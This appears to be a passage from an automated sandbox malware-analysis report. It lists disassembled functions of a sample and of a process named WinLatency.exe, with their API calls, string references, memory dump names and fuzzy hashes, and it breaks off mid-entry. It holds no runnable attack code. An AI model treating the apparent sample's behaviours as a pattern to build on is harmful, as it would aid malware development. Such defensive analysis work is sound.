Instruction Fuzzy Hash: 9241AF31288385AAD731DF64DC45BAEBBF9BB95700F04091EB5D093281D7A89A48DB53

Function 007FC099 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,007F89AD,?,00000000,?,00000001,?,?,00000001,007F89AD,?), ref: 007FC0E6
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 007FC16F
GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,007F67E2,?), ref: 007FC181
__freea.LIBCMT ref: 007FC18A

Part of subcall function 007F8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,007FC13D,00000000,?,007F67E2,?,00000008,?,007F89AD,?,?,?), ref: 007F854A

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 4add49b1bfa35cd67116ef79d557fc619de8079c8d09fa5b9aa6628156d6e22b
Instruction ID: 02019cece38073e58980655fbc6e8240c129f54166bd93a733ece554380d34be
Opcode Fuzzy Hash: 4add49b1bfa35cd67116ef79d557fc619de8079c8d09fa5b9aa6628156d6e22b
Instruction Fuzzy Hash: C031E3B2A0011EABDF268F65DD45DBE7BA5EB44310F140128FD04D7291E739CD60CBA0

Function 007F2503 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 007F251A

Part of subcall function 007F2B52: ___AdjustPointer.LIBCMT ref: 007F2B9C

_UnwindNestedFrames.LIBCMT ref: 007F2531
___FrameUnwindToState.LIBVCRUNTIME ref: 007F2543
CallCatchBlock.LIBVCRUNTIME ref: 007F2567

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
String ID:
API String ID: 2633735394-0
Opcode ID: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
Instruction ID: dca912c072a35cdc5d770b29e4832baa3e38e736590fad821372bdd509433cc4
Opcode Fuzzy Hash: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
Instruction Fuzzy Hash: F501053200010CEBCF129F65CC15EAA3BAAEF58714F158054FA1866221D33AE962ABA1

Function 007E9DBB Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 007E9DBE
GetDeviceCaps.GDI32(00000000,00000058), ref: 007E9DCD
GetDeviceCaps.GDI32(00000000,0000005A), ref: 007E9DDB
ReleaseDC.USER32(00000000,00000000), ref: 007E9DE9

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 0af8867cfe21c800871db35ac46fe2202cfe2cc267bfeead4fe44aa3b536fd1e
Instruction ID: 45457dead709c8b37a35e4c8a6b429f8532d71651a4eaa8920b7a7213133afb5
Opcode Fuzzy Hash: 0af8867cfe21c800871db35ac46fe2202cfe2cc267bfeead4fe44aa3b536fd1e
Instruction Fuzzy Hash: DEE0EC3198AA31A7D3281BA5BC1DB8B3B59BF49712F054415F70596190DA744449CB94

Function 007F2016 Relevance: 6.0, APIs: 4, Instructions: 14COMMON

Download Yara Rule

APIs

___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 007F2016
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 007F201B
___vcrt_initialize_locks.LIBVCRUNTIME ref: 007F2020

Part of subcall function 007F310E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 007F311F

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 007F2035

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID:
API String ID: 1761009282-0
Opcode ID: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
Instruction ID: 5d6c1d9e852f6535ad044aff937ad30d245fb326ae71adbb76dc9507517a028a
Opcode Fuzzy Hash: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
Instruction Fuzzy Hash: 20C04C26009A4CE41C113AB1620B1BD07400E637C4BA220C2EB8017343DE0E0A0BB037

Function 007E9F5D Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 007E9DF1: GetDC.USER32(00000000), ref: 007E9DF5
Part of subcall function 007E9DF1: GetDeviceCaps.GDI32(00000000,0000000C), ref: 007E9E00
Part of subcall function 007E9DF1: ReleaseDC.USER32(00000000,00000000), ref: 007E9E0B

GetObjectW.GDI32(?,00000018,?), ref: 007E9F8D

Part of subcall function 007EA1E5: GetDC.USER32(00000000), ref: 007EA1EE
Part of subcall function 007EA1E5: GetObjectW.GDI32(?,00000018,?), ref: 007EA21D
Part of subcall function 007EA1E5: ReleaseDC.USER32(00000000,?), ref: 007EA2B5

Strings

(, xrefs: 007EA0A3

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: ObjectRelease$CapsDevice
String ID: (
API String ID: 1061551593-3887548279
Opcode ID: 5e9315baa85d90847f022335c31d18ea82e56d09d0b270c4753702f659ca135e
Instruction ID: 1bec88c9942aa579630d6882cd9f310c9aede0c1e33abdbcfdbff2c7b6a3dab3
Opcode Fuzzy Hash: 5e9315baa85d90847f022335c31d18ea82e56d09d0b270c4753702f659ca135e
Instruction Fuzzy Hash: D1812071208248AFC654DF29CC44A2ABBE9FFC8715F00491DF98AD7260DB35AE05DB62

Function 007E0E37 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 007E0FF1

Strings

%s: %s, xrefs: 007E1000
%ls, xrefs: 007E0E76, 007E0E8C

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: _swprintf
String ID: %ls$%s: %s
API String ID: 589789837-2259941744
Opcode ID: 5ef2ad8560be0723b25bf2323d0a46c44e55623607b68260ea25e01c315f84eb
Instruction ID: 27c60b832c909ddab9312cb029b68a1e7c0a32976070b26a72e591c6cd8a2085
Opcode Fuzzy Hash: 5ef2ad8560be0723b25bf2323d0a46c44e55623607b68260ea25e01c315f84eb
Instruction Fuzzy Hash: 1B51E83128E7C0F9EA312AEACC57F367665A70CB00F644917F39A744D1C6FE54E06692

Function 007D772B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138timeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 007D7730
SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 007D78CC

Part of subcall function 007DA444: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,007DA27A,?,?,?,007DA113,?,00000001,00000000,?,?), ref: 007DA458
Part of subcall function 007DA444: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,007DA27A,?,?,?,007DA113,?,00000001,00000000,?,?), ref: 007DA489

Strings

:, xrefs: 007D77A1

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: File$Attributes$H_prologTime
String ID: :
API String ID: 1861295151-336475711
Opcode ID: 6482722214e6c27dabaa1b5a0a7e1ebd4924ebf984d67fe3c9cc5e819ea3b829
Instruction ID: 25e3b3b853d9d21fd6e75130e995bfc2a47c7cedc387fe8fc8c044cff43bf716
Opcode Fuzzy Hash: 6482722214e6c27dabaa1b5a0a7e1ebd4924ebf984d67fe3c9cc5e819ea3b829
Instruction Fuzzy Hash: 24415371905158EADB25EB50DD59EEEB37CAF45300F00409BB609A3292EB785F84DF61

Function 007DB66C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON

Download Yara Rule

Strings

UNC, xrefs: 007DB708
\\?\, xrefs: 007DB6BE, 007DB6FA, 007DB75B, 007DB7AE

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID:
String ID: UNC$\\?\
API String ID: 0-253988292
Opcode ID: b50a36e1f5f6581af4a2597371cff9d0741a3731d3a8725c288b4f73bef64569
Instruction ID: 6c6f99f346f703fdf7c8e9f40919da4c6bcb9127db8002f4b5fd41e89b20a1ee
Opcode Fuzzy Hash: b50a36e1f5f6581af4a2597371cff9d0741a3731d3a8725c288b4f73bef64569
Instruction Fuzzy Hash: 4F41A135400259EBDB20AF61CC45EEB77BDEF84760B12406BF815A3352E778EA50CAA0

Function 007E8FB6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 007E8FC4

Strings

Shell.Explorer, xrefs: 007E8FEF
about:blank, xrefs: 007E9082

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID:
String ID: Shell.Explorer$about:blank
API String ID: 0-874089819
Opcode ID: d0c8ea7c0d0e28130c67d15f8e812369c28e3aed3ede4095af69c3e5d87a7291
Instruction ID: 3d2d8594eff5a7a6f8427853cdf6f6e8b8942b0e0792f876e34609a68a554156
Opcode Fuzzy Hash: d0c8ea7c0d0e28130c67d15f8e812369c28e3aed3ede4095af69c3e5d87a7291
Instruction Fuzzy Hash: D921A572205345DFCB549F65CC95A2A77A8FF88311B14856DFA098F292DB78EC00CB60

Function 007DEBF2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

Part of subcall function 007DEB73: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 007DEB92
Part of subcall function 007DEB73: GetProcAddress.KERNEL32(008181C0,CryptUnprotectMemory), ref: 007DEBA2

GetCurrentProcessId.KERNEL32(?,?,?,007DEBEC), ref: 007DEC84

Strings

CryptProtectMemory failed, xrefs: 007DEC3B
CryptUnprotectMemory failed, xrefs: 007DEC7C

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: AddressProc$CurrentProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
API String ID: 2190909847-396321323
Opcode ID: 9f1a1e6695f717da19bc01021dc02d07d28ec8add46e732fe40a1f55aece1276
Instruction ID: e0143bd03af7856bf3f96db76aa259b392a3f3de220a9d76ab7f29d521531e1a
Opcode Fuzzy Hash: 9f1a1e6695f717da19bc01021dc02d07d28ec8add46e732fe40a1f55aece1276
Instruction Fuzzy Hash: FA110A32A15624ABDB166B24DD06AAE3728FF05721B048017FC099F391DB7D6E4187E4

Function 007E0889 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00010000,007E09D0,?,00000000,00000000), ref: 007E08AD
SetThreadPriority.KERNEL32(?,00000000), ref: 007E08F4

Part of subcall function 007D6E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007D6EAF

Strings

CreateThread failed, xrefs: 007E08B9

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: Thread$CreatePriority__vswprintf_c_l
String ID: CreateThread failed
API String ID: 2655393344-3849766595
Opcode ID: b7fed5055ab64b9014d8920a4da7cccca5de095cdd6da1ad7f1d4f76abfaf128
Instruction ID: be9c1d0a14c0ed6bd7903d9ebd1d6ea8d4b63278073c1ba1ad8be00055b0ca94
Opcode Fuzzy Hash: b7fed5055ab64b9014d8920a4da7cccca5de095cdd6da1ad7f1d4f76abfaf128
Instruction Fuzzy Hash: CF01D6B1345305AFD6206F55EC86BA673ACFF48711F10042EF686921C1CEF5B8C19AA4

Function 007D130B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 007DDA98: _swprintf.LIBCMT ref: 007DDABE
Part of subcall function 007DDA98: _strlen.LIBCMT ref: 007DDADF
Part of subcall function 007DDA98: SetDlgItemTextW.USER32(?,0080E154,?), ref: 007DDB3F
Part of subcall function 007DDA98: GetWindowRect.USER32(?,?), ref: 007DDB79
Part of subcall function 007DDA98: GetClientRect.USER32(?,?), ref: 007DDB85

GetDlgItem.USER32(00000000,00003021), ref: 007D134F
SetWindowTextW.USER32(00000000,008035B4), ref: 007D1365

Strings

0, xrefs: 007D130E

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: ItemRectTextWindow$Client_strlen_swprintf
String ID: 0
API String ID: 2622349952-4108050209
Opcode ID: f7858010ef4d6a0fa7820b26c8860a9752fb1abac92ccc2bad32ce6cb8fc1d06
Instruction ID: 97da93640dcc4d2dd17f6165a90a7dfc3b4026a34d4ee7f05f18d18964731e05
Opcode Fuzzy Hash: f7858010ef4d6a0fa7820b26c8860a9752fb1abac92ccc2bad32ce6cb8fc1d06
Instruction Fuzzy Hash: C0F0AF3010028CB6DF250F618D0DBED3BB8BF52305F488416FD89946A1C77CC995EB10

Function 007E084E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,007E0A78,?), ref: 007E0854
GetLastError.KERNEL32(?), ref: 007E0860

Part of subcall function 007D6E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007D6EAF

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 007E0869

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: ErrorLastObjectSingleWait__vswprintf_c_l
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1091760877-2248577382
Opcode ID: d80b4b8c3a53ffd3864ebe22ce309e01cd57d163375485c9818c1bc2b075ff33
Instruction ID: c71cf1d01ac5a7bbb871be8b9edbccba0f6c461cc308ff5d03a11a3772ff24b9
Opcode Fuzzy Hash: d80b4b8c3a53ffd3864ebe22ce309e01cd57d163375485c9818c1bc2b075ff33
Instruction Fuzzy Hash: 37D02E31A0942062CA002324AC0EEAF3A18BF42730F200316F239A92F0DF28098182E1

Function 007DDA4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,007DD32F,?), ref: 007DDA53
FindResourceW.KERNEL32(00000000,RTL,00000005,?,007DD32F,?), ref: 007DDA61

Strings

RTL, xrefs: 007DDA5B

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: 79c9758ddf42f24db54e5506591fa7f1c506862506c90f7a6eff26f98d876b64
Instruction ID: c1f4e0435430622599f4af3c3906aee36cbb8274329ce06c7d4ef36a487b60dc
Opcode Fuzzy Hash: 79c9758ddf42f24db54e5506591fa7f1c506862506c90f7a6eff26f98d876b64
Instruction Fuzzy Hash: 32C01231286B5076D77017716C0DB432E9C7F11B11F05044DB181DA2D0D5E9CD448650

Analysis Process: WinLatency.exePID: 7636, Parent PID: 7584COMMON

Executed Functions

Function 00007FFD9B7533B8 Relevance: .4, Instructions: 430COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1884923268.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b750000_WinLatency.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5213aa9043f5db4682b7fe64d0639595e9b072f6d0fd3da46cd2c3eebd4b1e1
Instruction ID: 89edf8d997abc52676bab13cd8427b606492a7ade5d2fb449ab900ea624413c5
Opcode Fuzzy Hash: b5213aa9043f5db4682b7fe64d0639595e9b072f6d0fd3da46cd2c3eebd4b1e1
Instruction Fuzzy Hash: FAE1D331A19A4E8FEB54DBA8C8687BD7BE0FF59300F5101BAD01EC72F5DAB469428750

Function 00007FFD9B753565 Relevance: .3, Instructions: 257COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1884923268.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b750000_WinLatency.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83d07d3805bfe5a3fbad7585b16fb83f4b053a9f5ad70c5a34f3f715cefbd912
Instruction ID: c8951393f3cf8830097f10ef055b474aaddf9f83c83b41d9521e26ec9f7b19f6
Opcode Fuzzy Hash: 83d07d3805bfe5a3fbad7585b16fb83f4b053a9f5ad70c5a34f3f715cefbd912
Instruction Fuzzy Hash: 9281D571A19A4D8FE798DBA8C8657EC7BE1EF95310F4102B9D00EC72E6DFA468068750

Function 00007FFD9B75EB07 Relevance: 11.5, Strings: 9, Instructions: 232COMMON

Download Yara Rule

Strings

X, xrefs: 00007FFD9B75ECF0
}, xrefs: 00007FFD9B75ED47
I, xrefs: 00007FFD9B75EB14
E, xrefs: 00007FFD9B7600AB
{, xrefs: 00007FFD9B75FFC7
{, xrefs: 00007FFD9B75ECE7
K, xrefs: 00007FFD9B75ED80
L, xrefs: 00007FFD9B75FB0B
7, xrefs: 00007FFD9B75EB61

Memory Dump Source

Source File: 00000006.00000002.1884923268.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b750000_WinLatency.jbxd

Similarity

API ID:
String ID: 7$E$I$K$L$X${${$}
API String ID: 0-1139972885
Opcode ID: 202c75027a981a34ff98a619a9214a11d143f6ebeac411382f057b85f1fdcf26
Instruction ID: 74e595287a7198ecd431b039a2884c9fee7e5d481dabcae39a137106d92cedc3
Opcode Fuzzy Hash: 202c75027a981a34ff98a619a9214a11d143f6ebeac411382f057b85f1fdcf26
Instruction Fuzzy Hash: 38B1C470A0972D8FEBA8DF54C8A47A9B7B1FB54301F0101EAD44DA72A1DB786E81DF00

Function 00007FFD9B75F464 Relevance: 3.9, Strings: 3, Instructions: 141COMMON

Download Yara Rule

Strings

A, xrefs: 00007FFD9B760434
_, xrefs: 00007FFD9B760498
Z, xrefs: 00007FFD9B75F471

Memory Dump Source

Source File: 00000006.00000002.1884923268.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b750000_WinLatency.jbxd

Similarity

API ID:
String ID: A$Z$_
API String ID: 0-3891705896
